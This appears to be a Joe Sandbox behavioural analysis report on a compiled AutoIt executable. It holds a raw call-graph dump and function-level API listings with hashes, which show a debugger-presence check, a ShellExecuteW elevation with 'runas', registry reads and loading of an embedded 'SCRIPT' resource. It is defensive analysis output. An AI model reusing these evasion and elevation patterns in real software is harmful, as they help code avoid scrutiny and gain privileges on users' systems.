__cinit 67 API calls 101279->101281 101282 c93378 __cinit __IsNonwritableInCurrentImage 101279->101282 101356 c9a711 101280->101356 101281->101282 101282->101201 101284 c74948 101283->101284 101294 c749e7 101283->101294 101285 c74982 745AC8D0 101284->101285 101359 c935ac 101285->101359 101289 c749ae 101371 c74a5b SystemParametersInfoW SystemParametersInfoW 101289->101371 101291 c749ba 101372 c73b4c 101291->101372 101293 c749c2 SystemParametersInfoW 101293->101294 101294->101205 101295->101179 101296->101183 101297->101190 101301->101206 101302->101209 101303->101215 101304->101217 101305->101221 101306->101222 101309 c98a1c 101307->101309 101310 c98a57 101309->101310 101312 c98a3a 101309->101312 101316 ca5446 101309->101316 101310->101226 101313 c9a026 TlsSetValue 101310->101313 101312->101309 101312->101310 101324 c9a372 Sleep 101312->101324 101313->101229 101314->101233 101315->101230 101317 ca5451 101316->101317 101321 ca546c 101316->101321 101318 ca545d 101317->101318 101317->101321 101325 c98d68 58 API calls __getptd_noexit 101318->101325 101319 ca547c RtlAllocateHeap 101319->101321 101322 ca5462 101319->101322 101321->101319 101321->101322 101326 c935e1 RtlDecodePointer 101321->101326 101322->101309 101324->101312 101325->101322 101326->101321 101327->101246 101328->101243 101329->101241 101330->101258 101331->101262 101332->101273 101334 c99011 101333->101334 101339 c98e99 101334->101339 101338 c9902c 101338->101276 101340 c98eb3 _memset ___raise_securityfailure 101339->101340 101341 c98ed3 IsDebuggerPresent 101340->101341 101347 c9a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 101341->101347 101344 c98f97 ___raise_securityfailure 101348 c9c836 101344->101348 101345 c98fba 101346 c9a380 GetCurrentProcess TerminateProcess 101345->101346 101346->101338 101347->101344 101349 c9c83e 101348->101349 101350 c9c840 IsProcessorFeaturePresent 101348->101350 101349->101345 101352 ca5b5a 101350->101352 101355 ca5b09 5 API calls ___raise_securityfailure 101352->101355 101354 ca5c3d 101354->101345 101355->101354 101357 c9a714 RtlEncodePointer 101356->101357 101357->101357 101358 c9a72e 101357->101358 101358->101279 101360 c99e4b __lock 58 API calls 101359->101360 101361 c935b7 RtlDecodePointer RtlEncodePointer 101360->101361 101424 c99fb5 RtlLeaveCriticalSection 101361->101424 101363 c749a7 101364 c93614 101363->101364 101365 c93638 101364->101365 101366 c9361e 101364->101366 101365->101289 101366->101365 101425 c98d68 58 API calls __getptd_noexit 101366->101425 101368 c93628 101426 c98ff6 9 API calls _raise 101368->101426 101370 c93633 101370->101289 101371->101291 101373 c73b59 __ftell_nolock 101372->101373 101374 c777c7 59 API calls 101373->101374 101375 c73b63 GetCurrentDirectoryW 101374->101375 101427 c73778 101375->101427 101377 c73b8c IsDebuggerPresent 101378 cad4ad MessageBoxA 101377->101378 101379 c73b9a 101377->101379 101381 cad4c7 101378->101381 101379->101381 101382 c73bb7 101379->101382 101411 c73c73 101379->101411 101380 c73c7a SetCurrentDirectoryW 101385 c73c87 Mailbox 101380->101385 101549 c77373 59 API calls Mailbox 101381->101549 101508 c773e5 101382->101508 101385->101293 101386 cad4d7 101391 cad4ed SetCurrentDirectoryW 101386->101391 101391->101385 101411->101380 101424->101363 101425->101368 101426->101370 101428 c777c7 59 API calls 101427->101428 101429 c7378e 101428->101429 101558 c73d43 101429->101558 101431 c737ac 101432 c74864 61 API calls 101431->101432 101433 c737c0 101432->101433 101434 c77f41 59 API calls 101433->101434 101435 c737cd 101434->101435 101436 c74f3d 135 API calls 101435->101436 101437 c737e6 101436->101437 101438 cad3ae 101437->101438 101439 c737ee Mailbox 101437->101439 101597 cd97e5 101438->101597 101442 c781a7 59 API calls 101439->101442 101445 c73801 101442->101445 101443 c74faa 84 API calls 101446 cad3cd 101443->101446 101444 c92f95 _free 58 API calls 101447 cad3da 101444->101447 101448 c793ea 59 API calls 101445->101448 101446->101444 101449 c74faa 84 API calls 101447->101449 101450 c7380d 101448->101450 101452 cad3e3 101449->101452 101451 c77f41 59 API calls 101450->101451 101453 c7381a 101451->101453 101455 c73ee2 59 API calls 101452->101455 101454 c78620 69 API calls 101453->101454 101456 c7382c Mailbox 101454->101456 101457 cad3fe 101455->101457 101458 c77f41 59 API calls 101456->101458 101459 c73ee2 59 API calls 101457->101459 101460 c73852 101458->101460 101461 cad41a 101459->101461 101462 c78620 69 API calls 101460->101462 101463 c74864 61 API calls 101461->101463 101465 c73861 Mailbox 101462->101465 101464 cad43f 101463->101464 101466 c73ee2 59 API calls 101464->101466 101468 c777c7 59 API calls 101465->101468 101467 cad44b 101466->101467 101469 c781a7 59 API calls 101467->101469 101470 c7387f 101468->101470 101472 cad459 101469->101472 101572 c73ee2 101470->101572 101473 c73ee2 59 API calls 101472->101473 101475 cad468 101473->101475 101481 c781a7 59 API calls 101475->101481 101477 c73899 101477->101452 101478 c738a3 101477->101478 101479 c9313d _W_store_winword 60 API calls 101478->101479 101480 c738ae 101479->101480 101480->101457 101482 c738b8 101480->101482 101483 cad48a 101481->101483 101484 c9313d _W_store_winword 60 API calls 101482->101484 101485 c73ee2 59 API calls 101483->101485 101486 c738c3 101484->101486 101487 cad497 101485->101487 101486->101461 101488 c738cd 101486->101488 101487->101487 101489 c9313d _W_store_winword 60 API calls 101488->101489 101490 c738d8 101489->101490 101490->101475 101491 c73919 101490->101491 101493 c73ee2 59 API calls 101490->101493 101491->101475 101492 c73926 101491->101492 101495 c7942e 59 API calls 101492->101495 101494 c738fc 101493->101494 101496 c781a7 59 API calls 101494->101496 101497 c73936 101495->101497 101498 c7390a 101496->101498 101499 c791b0 59 API calls 101497->101499 101500 c73ee2 59 API calls 101498->101500 101501 c73944 101499->101501 101500->101491 101588 c79040 101501->101588 101503 c793ea 59 API calls 101505 c73961 101503->101505 101504 c79040 60 API calls 101504->101505 101505->101503 101505->101504 101506 c73ee2 59 API calls 101505->101506 101507 c739a7 Mailbox 101505->101507 101506->101505 101507->101377 101509 c773f2 __ftell_nolock 101508->101509 101510 caee4b _memset 101509->101510 101511 c7740b 101509->101511 101513 caee67 7516D0D0 101510->101513 101645 c748ae 101511->101645 101515 caeeb6 101513->101515 101517 c77d2c 59 API calls 101515->101517 101520 caeecb 101517->101520 101520->101520 101521 c77429 101673 c769ca 101521->101673 101549->101386 101559 c73d50 __ftell_nolock 101558->101559 101560 c77d2c 59 API calls 101559->101560 101566 c73eb6 Mailbox 101559->101566 101562 c73d82 101560->101562 101561 c77b52 59 API calls 101561->101562 101562->101561 101571 c73db8 Mailbox 101562->101571 101563 c77b52 59 API calls 101563->101571 101564 c73e89 101565 c77f41 59 API calls 101564->101565 101564->101566 101568 c73eaa 101565->101568 101566->101431 101567 c77f41 59 API calls 101567->101571 101569 c73f84 59 API calls 101568->101569 101569->101566 101571->101563 101571->101564 101571->101566 101571->101567 101632 c73f84 101571->101632 101573 c73f05 101572->101573 101574 c73eec 101572->101574 101576 c77d2c 59 API calls 101573->101576 101575 c781a7 59 API calls 101574->101575 101577 c7388b 101575->101577 101576->101577 101578 c9313d 101577->101578 101579 c93149 101578->101579 101580 c931be 101578->101580 101584 c9316e 101579->101584 101638 c98d68 58 API calls __getptd_noexit 101579->101638 101640 c931d0 60 API calls 3 library calls 101580->101640 101583 c931cb 101583->101477 101584->101477 101585 c93155 101639 c98ff6 9 API calls _raise 101585->101639 101587 c93160 101587->101477 101589 caf5a5 101588->101589 101591 c79057 101588->101591 101589->101591 101642 c78d3b 59 API calls Mailbox 101589->101642 101592 c791a0 101591->101592 101593 c79158 101591->101593 101596 c7915f 101591->101596 101641 c79e9c 60 API calls Mailbox 101592->101641 101595 c90ff6 Mailbox 59 API calls 101593->101595 101595->101596 101596->101505 101598 c75045 85 API calls 101597->101598 101599 cd9854 101598->101599 101643 cd99be 96 API calls 2 library calls 101599->101643 101601 cd9866 101602 c7506b 74 API calls 101601->101602 101631 cad3c1 101601->101631 101603 cd9881 101602->101603 101604 c7506b 74 API calls 101603->101604 101605 cd9891 101604->101605 101606 c7506b 74 API calls 101605->101606 101607 cd98ac 101606->101607 101608 c7506b 74 API calls 101607->101608 101609 cd98c7 101608->101609 101610 c75045 85 API calls 101609->101610 101611 cd98de 101610->101611 101612 c9594c __crtCompareStringA_stat 58 API calls 101611->101612 101613 cd98e5 101612->101613 101614 c9594c __crtCompareStringA_stat 58 API calls 101613->101614 101615 cd98ef 101614->101615 101616 c7506b 74 API calls 101615->101616 101617 cd9903 101616->101617 101644 cd9393 GetSystemTimeAsFileTime 101617->101644 101619 cd9916 101620 cd992b 101619->101620 101621 cd9940 101619->101621 101624 c92f95 _free 58 API calls 101620->101624 101622 cd99a5 101621->101622 101623 cd9946 101621->101623 101626 c92f95 _free 58 API calls 101622->101626 101625 cd8d90 116 API calls 101623->101625 101627 cd9931 101624->101627 101628 cd999d 101625->101628 101626->101631 101629 c92f95 _free 58 API calls 101627->101629 101630 c92f95 _free 58 API calls 101628->101630 101629->101631 101630->101631 101631->101443 101631->101446 101633 c73f92 101632->101633 101637 c73fb4 _memmove 101632->101637 101636 c90ff6 Mailbox 59 API calls 101633->101636 101634 c90ff6 Mailbox 59 API calls 101635 c73fc8 101634->101635 101635->101571 101636->101637 101637->101634 101638->101585 101639->101587 101640->101583 101641->101596 101642->101591 101643->101601 101644->101619 101707 ca1b90 101645->101707 101648 c748f7 101650 c77eec 59 API calls 101648->101650 101649 c748da 101651 c77d2c 59 API calls 101649->101651 101652 c748e6 101650->101652 101651->101652 101653 c77886 59 API calls 101652->101653 101654 c748f2 101653->101654 101655 c909d5 101654->101655 101656 ca1b90 __ftell_nolock 101655->101656 101657 c909e2 GetLongPathNameW 101656->101657 101658 c77d2c 59 API calls 101657->101658 101659 c7741d 101658->101659 101660 c7716b 101659->101660 101661 c777c7 59 API calls 101660->101661 101662 c7717d 101661->101662 101663 c748ae 60 API calls 101662->101663 101664 c77188 101663->101664 101665 c77193 101664->101665 101670 caecae 101664->101670 101666 c73f84 59 API calls 101665->101666 101668 c7719f 101666->101668 101709 c734c2 101668->101709 101672 caecc8 101670->101672 101715 c77a68 61 API calls 101670->101715 101671 c771b2 Mailbox 101671->101521 101674 c74f3d 135 API calls 101673->101674 101675 c769ef 101674->101675 101676 cae45a 101675->101676 101677 c74f3d 135 API calls 101675->101677 101678 cd97e5 122 API calls 101676->101678 101679 c76a03 101677->101679 101680 cae46f 101678->101680 101679->101676 101681 c76a0b 101679->101681 101682 cae473 101680->101682 101683 cae490 101680->101683 101686 c76a17 101681->101686 101687 cae47b 101681->101687 101684 c74faa 84 API calls 101682->101684 101685 c90ff6 Mailbox 59 API calls 101683->101685 101684->101687 101699 cae4d5 Mailbox 101685->101699 101716 c76bec 101686->101716 101808 cd4534 90 API calls _wprintf 101687->101808 101690 cae489 101690->101683 101692 cae689 101693 c92f95 _free 58 API calls 101692->101693 101694 cae691 101693->101694 101695 c74faa 84 API calls 101694->101695 101701 cae69a 101695->101701 101699->101692 101699->101701 101704 c77f41 59 API calls 101699->101704 101809 ccfc4d 59 API calls 2 library calls 101699->101809 101810 ccfb6e 61 API calls 2 library calls 101699->101810 101811 cd7621 59 API calls Mailbox 101699->101811 101812 c7766f 59 API calls 2 library calls 101699->101812 101813 c774bd 59 API calls Mailbox 101699->101813 101700 c92f95 _free 58 API calls 101700->101701 101701->101700 101703 c74faa 84 API calls 101701->101703 101814 ccfcb1 89 API calls 4 library calls 101701->101814 101703->101701 101704->101699 101708 c748bb GetFullPathNameW 101707->101708 101708->101648 101708->101649 101710 c734d4 101709->101710 101714 c734f3 _memmove 101709->101714 101713 c90ff6 Mailbox 59 API calls 101710->101713 101711 c90ff6 Mailbox 59 API calls 101712 c7350a 101711->101712 101712->101671 101713->101714 101714->101711 101715->101670 101717 c76c15 101716->101717 101718 cae847 101716->101718 101820 c75906 60 API calls Mailbox 101717->101820 101836 ccfcb1 89 API calls 4 library calls 101718->101836 101721 cae85a 101837 ccfcb1 89 API calls 4 library calls 101721->101837 101722 c76c37 101821 c75956 67 API calls 101722->101821 101724 c76c4c 101724->101721 101726 c76c54 101724->101726 101728 c777c7 59 API calls 101726->101728 101727 cae876 101731 c76cc1 101727->101731 101729 c76c60 101728->101729 101733 cae889 101731->101733 101734 c76ccf 101731->101734 101736 c75dcf CloseHandle 101733->101736 101737 c777c7 59 API calls 101734->101737 101808->101690 101809->101699 101810->101699 101811->101699 101812->101699 101813->101699 101814->101701 101820->101722 101821->101724 101836->101721 101837->101727 101871 cb0251 101872 c8fb84 60 API calls 101871->101872 101873 cb0267 101872->101873 101874 cb02e8 101873->101874 101875 cb027d 101873->101875 101877 c7fe40 330 API calls 101874->101877 101883 c79fbd 60 API calls 101875->101883 101878 cb02dc Mailbox 101877->101878 101880 cb0ce1 Mailbox 101878->101880 101885 cda0b5 89 API calls 4 library calls 101878->101885 101881 cb02bc 101881->101878 101884 cd85d9 59 API calls Mailbox 101881->101884 101883->101881 101884->101878 101885->101880 101886 c71078 101891 c771eb 101886->101891 101888 c7108c 101889 c92f80 __cinit 67 API calls 101888->101889 101890 c71096 101889->101890 101892 c771fb __ftell_nolock 101891->101892 101893 c777c7 59 API calls 101892->101893 101894 c772b1 101893->101894 101895 c74864 61 API calls 101894->101895 101896 c772ba 101895->101896 101922 c9074f 101896->101922 101899 c77e0b 59 API calls 101900 c772d3 101899->101900 101901 c73f84 59 API calls 101900->101901 101902 c772e2 101901->101902 101903 c777c7 59 API calls 101902->101903 101904 c772eb 101903->101904 101905 c77eec 59 API calls 101904->101905 101906 c772f4 RegOpenKeyExW 101905->101906 101907 caecda RegQueryValueExW 101906->101907 101911 c77316 Mailbox 101906->101911 101908 caed6c RegCloseKey 101907->101908 101909 caecf7 101907->101909 101908->101911 101921 caed7e _wcscat Mailbox __NMSG_WRITE 101908->101921 101910 c90ff6 Mailbox 59 API calls 101909->101910 101912 caed10 101910->101912 101911->101888 101914 c7538e 59 API calls 101912->101914 101913 c77b52 59 API calls 101913->101921 101915 caed1b RegQueryValueExW 101914->101915 101916 caed38 101915->101916 101918 caed52 101915->101918 101917 c77d2c 59 API calls 101916->101917 101917->101918 101918->101908 101919 c77f41 59 API calls 101919->101921 101920 c73f84 59 API calls 101920->101921 101921->101911 101921->101913 101921->101919 101921->101920 101923 ca1b90 __ftell_nolock 101922->101923 101924 c9075c GetFullPathNameW 101923->101924 101925 c9077e 101924->101925 101926 c77d2c 59 API calls 101925->101926 101927 c772c5 101926->101927 101927->101899

                    Executed Functions

                    Function 00C73B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C73B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00C73B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D362F8,00D362E0,?,?), ref: 00C73BFD
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                      • Part of subcall function 00C80A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C73C26,00D362F8,?,?,?), ref: 00C80ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C73C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00D293F0,00000010), ref: 00CAD4BC
                    • SetCurrentDirectoryW.KERNEL32(?,00D362F8,?,?,?), ref: 00CAD4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D25D40,00D362F8,?,?,?), ref: 00CAD57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00CAD581
                      • Part of subcall function 00C73A58: GetSysColorBrush.USER32(0000000F), ref: 00C73A62
                      • Part of subcall function 00C73A58: LoadCursorW.USER32(00000000,00007F00), ref: 00C73A71
                      • Part of subcall function 00C73A58: LoadIconW.USER32(00000063), ref: 00C73A88
                      • Part of subcall function 00C73A58: LoadIconW.USER32(000000A4), ref: 00C73A9A
                      • Part of subcall function 00C73A58: LoadIconW.USER32(000000A2), ref: 00C73AAC
                      • Part of subcall function 00C73A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C73AD2
                      • Part of subcall function 00C73A58: RegisterClassExW.USER32(?), ref: 00C73B28
                      • Part of subcall function 00C739E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C73A15
                      • Part of subcall function 00C739E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C73A36
                      • Part of subcall function 00C739E7: ShowWindow.USER32(00000000,?,?), ref: 00C73A4A
                      • Part of subcall function 00C739E7: ShowWindow.USER32(00000000,?,?), ref: 00C73A53
                      • Part of subcall function 00C743DB: _memset.LIBCMT ref: 00C74401
                      • Part of subcall function 00C743DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C744A6
                    Strings
                    • This is a third-party compiled AutoIt script., xrefs: 00CAD4B4
                    • runas, xrefs: 00CAD575
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas
                    • API String ID: 529118366-3287110873
                    • Opcode ID: 74dfd5a8c0d075bfafaff01e1bee573f1c09fe079cc01007d8d228443637c686
                    • Instruction ID: 76e0d4b9cd58bf456c218b4bbd492ece64702f55ec0ba4dfb12a334d17c1daf5
                    • Opcode Fuzzy Hash: 74dfd5a8c0d075bfafaff01e1bee573f1c09fe079cc01007d8d228443637c686
                    • Instruction Fuzzy Hash: 7451F975D04289BECB11EBB4DC05EFE7B74AF05304F04C269F46AA62A1DA708646EB35
                    Function 00C73633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 765 c73633-c73681 767 c73683-c73686 765->767 768 c736e1-c736e3 765->768 769 c736e7 767->769 770 c73688-c7368f 767->770 768->767 771 c736e5 768->771 775 cad31c-cad34a call c811d0 call c811f3 769->775 776 c736ed-c736f0 769->776 772 c73695-c7369a 770->772 773 c7375d-c73765 PostQuitMessage 770->773 774 c736ca-c736d2 NtdllDefWindowProc_W 771->774 777 cad38f-cad3a3 call cd2a16 772->777 778 c736a0-c736a2 772->778 781 c73711-c73713 773->781 780 c736d8-c736de 774->780 812 cad34f-cad356 775->812 782 c73715-c7373c SetTimer RegisterClipboardFormatW 776->782 783 c736f2-c736f3 776->783 777->781 805 cad3a9 777->805 786 c73767-c73776 call c74531 778->786 787 c736a8-c736ad 778->787 781->780 782->781 788 c7373e-c73749 CreatePopupMenu 782->788 784 cad2bf-cad2c2 783->784 785 c736f9-c7370c KillTimer call c744cb call c73114 783->785 797 cad2f8-cad317 MoveWindow 784->797 798 cad2c4-cad2c6 784->798 785->781 786->781 792 c736b3-c736b8 787->792 793 cad374-cad37b 787->793 788->781 803 c736be-c736c4 792->803 804 c7374b-c7375b call c745df 792->804 793->774 802 cad381-cad38a call cc817e 793->802 797->781 799 cad2c8-cad2cb 798->799 800 cad2e7-cad2f3 SetFocus 798->800 799->803 808 cad2d1-cad2e2 call c811d0 799->808 800->781 802->774 803->774 803->812 804->781 805->774 808->781 812->774 816 cad35c-cad36f call c744cb call c743db 812->816 816->774
                    APIs
                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00C736D2
                    • KillTimer.USER32(?,00000001), ref: 00C736FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C7371F
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C7372A
                    • CreatePopupMenu.USER32 ref: 00C7373E
                    • PostQuitMessage.USER32(00000000), ref: 00C7375F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                    • String ID: TaskbarCreated
                    • API String ID: 157504867-2362178303
                    • Opcode ID: 533daa5b9c364d67613c23193ce7e40fe115e9aff8ee24829aa6e4f30f27e8de
                    • Instruction ID: 55bdaaef5454d1d46fcbbcb38ae483eb1e460e359148632b232f89eef737cdbc
                    • Opcode Fuzzy Hash: 533daa5b9c364d67613c23193ce7e40fe115e9aff8ee24829aa6e4f30f27e8de
                    • Instruction Fuzzy Hash: F041F4B2200285BBDF186B28DD49B7E3795FB45340F148129F91AC63A1CB60EE41F776
                    Function 00C74AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1047 c74afe-c74b5e call c777c7 GetVersionExW call c77d2c 1052 c74b64 1047->1052 1053 c74c69-c74c6b 1047->1053 1054 c74b67-c74b6c 1052->1054 1055 cadb90-cadb9c 1053->1055 1057 c74b72 1054->1057 1058 c74c70-c74c71 1054->1058 1056 cadb9d-cadba1 1055->1056 1059 cadba3 1056->1059 1060 cadba4-cadbb0 1056->1060 1061 c74b73-c74baa call c77e8c call c77886 1057->1061 1058->1061 1059->1060 1060->1056 1062 cadbb2-cadbb7 1060->1062 1070 cadc8d-cadc90 1061->1070 1071 c74bb0-c74bb1 1061->1071 1062->1054 1064 cadbbd-cadbc4 1062->1064 1064->1055 1066 cadbc6 1064->1066 1069 cadbcb-cadbce 1066->1069 1072 c74bf1-c74c08 GetCurrentProcess IsWow64Process 1069->1072 1073 cadbd4-cadbf2 1069->1073 1074 cadca9-cadcad 1070->1074 1075 cadc92 1070->1075 1071->1069 1076 c74bb7-c74bc2 1071->1076 1077 c74c0d-c74c1e 1072->1077 1078 c74c0a 1072->1078 1073->1072 1079 cadbf8-cadbfe 1073->1079 1083 cadc98-cadca1 1074->1083 1084 cadcaf-cadcb8 1074->1084 1080 cadc95 1075->1080 1081 cadc13-cadc19 1076->1081 1082 c74bc8-c74bca 1076->1082 1086 c74c20-c74c30 call c74c95 1077->1086 1087 c74c89-c74c93 GetSystemInfo 1077->1087 1078->1077 1088 cadc08-cadc0e 1079->1088 1089 cadc00-cadc03 1079->1089 1080->1083 1092 cadc1b-cadc1e 1081->1092 1093 cadc23-cadc29 1081->1093 1090 cadc2e-cadc3a 1082->1090 1091 c74bd0-c74bd3 1082->1091 1083->1074 1084->1080 1085 cadcba-cadcbd 1084->1085 1085->1083 1104 c74c32-c74c3f call c74c95 1086->1104 1105 c74c7d-c74c87 GetSystemInfo 1086->1105 1094 c74c56-c74c66 1087->1094 1088->1072 1089->1072 1095 cadc3c-cadc3f 1090->1095 1096 cadc44-cadc4a 1090->1096 1098 cadc5a-cadc5d 1091->1098 1099 c74bd9-c74be8 1091->1099 1092->1072 1093->1072 1095->1072 1096->1072 1098->1072 1101 cadc63-cadc78 1098->1101 1102 cadc4f-cadc55 1099->1102 1103 c74bee 1099->1103 1106 cadc7a-cadc7d 1101->1106 1107 cadc82-cadc88 1101->1107 1102->1072 1103->1072 1112 c74c76-c74c7b 1104->1112 1113 c74c41-c74c45 GetNativeSystemInfo 1104->1113 1108 c74c47-c74c4b 1105->1108 1106->1072 1107->1072 1108->1094 1111 c74c4d-c74c50 FreeLibrary 1108->1111 1111->1094 1112->1113 1113->1108
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00C74B2B
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    • GetCurrentProcess.KERNEL32(?,00CFFAEC,00000000,00000000,?), ref: 00C74BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00C74BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C74C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00C74C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00C74C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00C74C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: 61cecaedda68927a96c9c82e20c19210b038a95939c1dd6e83490a66d5ef3487
                    • Instruction ID: 95705cc008bb7523154a77baa6d00bb5eea9d9364589ba573a1491dbf99dbb9f
                    • Opcode Fuzzy Hash: 61cecaedda68927a96c9c82e20c19210b038a95939c1dd6e83490a66d5ef3487
                    • Instruction Fuzzy Hash: 9491D63154ABC4DFC735CB7894512AABFE4AF66304B44899DD0DF93A01D320EA48D72A
                    Function 00C74FE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1180 c74fe9-c74ff7 1181 c74fff-c75001 1180->1181 1182 c75003-c7501a FindResourceExW 1181->1182 1183 c75021-c75026 1181->1183 1184 cadd5c-cadd6b LoadResource 1182->1184 1185 c75020 1182->1185 1184->1185 1186 cadd71-cadd7f SizeofResource 1184->1186 1185->1183 1186->1185 1187 cadd85-cadd90 LockResource 1186->1187 1187->1185 1188 cadd96-caddb4 1187->1188 1188->1185
                    APIs
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C74EEE,?,?,00000000,00000000), ref: 00C75010
                    • LoadResource.KERNEL32(?,00000000,?,?,00C74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C74F8F), ref: 00CADD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00C74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C74F8F), ref: 00CADD75
                    • LockResource.KERNEL32(00C74EEE,?,?,00C74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00C74F8F,00000000), ref: 00CADD88
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SCRIPT
                    • API String ID: 3473537107-3967369404
                    • Opcode ID: 112952299e90dafd827e6adbda1e658c5eea35137e3223d2ab70c86194e19710
                    • Instruction ID: a57b98436ac36c984e20d82ff379b2482ebdd8ea6b912c45ecafc3ece37225fc
                    • Opcode Fuzzy Hash: 112952299e90dafd827e6adbda1e658c5eea35137e3223d2ab70c86194e19710
